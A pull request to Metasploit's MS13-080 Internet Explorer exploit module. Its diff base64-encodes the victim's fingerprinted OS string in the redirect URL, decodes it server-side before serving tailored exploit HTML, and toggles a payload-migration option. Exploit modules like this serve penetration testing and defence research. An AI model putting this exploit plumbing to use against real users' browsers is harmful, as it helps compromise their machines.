### PR TITLE
Use Base64 encoding for OS parameter

### DIFF
--- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
+++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -76,6 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
+          'PrependMigrate'       => true,
           'InitialAutoRunScript' => 'migrate -f'
         },
       'Privileged'     => false,
@@ -88,6 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def get_check_html
     %Q|<html>
 <script>
+#{js_base64}
 #{js_os_detect}
 
 function os() {
@@ -119,7 +121,7 @@ function dll() {
 }
 
 window.onload = function() {
-  window.location = "#{get_resource}/search?o=" + escape(os()) + "&d=" + dll();
+  window.location = "#{get_resource}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
 }
 </script>
 </html>
@@ -280,7 +282,12 @@ function kaiju() {
 
   def on_request_uri(cli, request)
     if request.uri =~ /search\?o=(.+)\&d=(.+)$/
-      target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) }
+      target_info =
+      {
+        :os  => Rex::Text.decode_base64(Rex::Text.uri_decode($1)),
+        :dll => Rex::Text.uri_decode($2)
+      }
+
       sploit = get_sploit_html(target_info)
       send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
       return

--- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
+++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'PrependMigrate'       => true,
+          #'PrependMigrate'       => true,
           'InitialAutoRunScript' => 'migrate -f'
         },
       'Privileged'     => false,


### PR DESCRIPTION
I didn't even realize we already added this base64 code in server.rb. So instead of just escaping the OS parameter, we also encode the data in base64. ~~I also added prependmigrate to avoid possible unstable conditions for the payload.~~

Thanks to @Meatballs1 for the original suggestion.
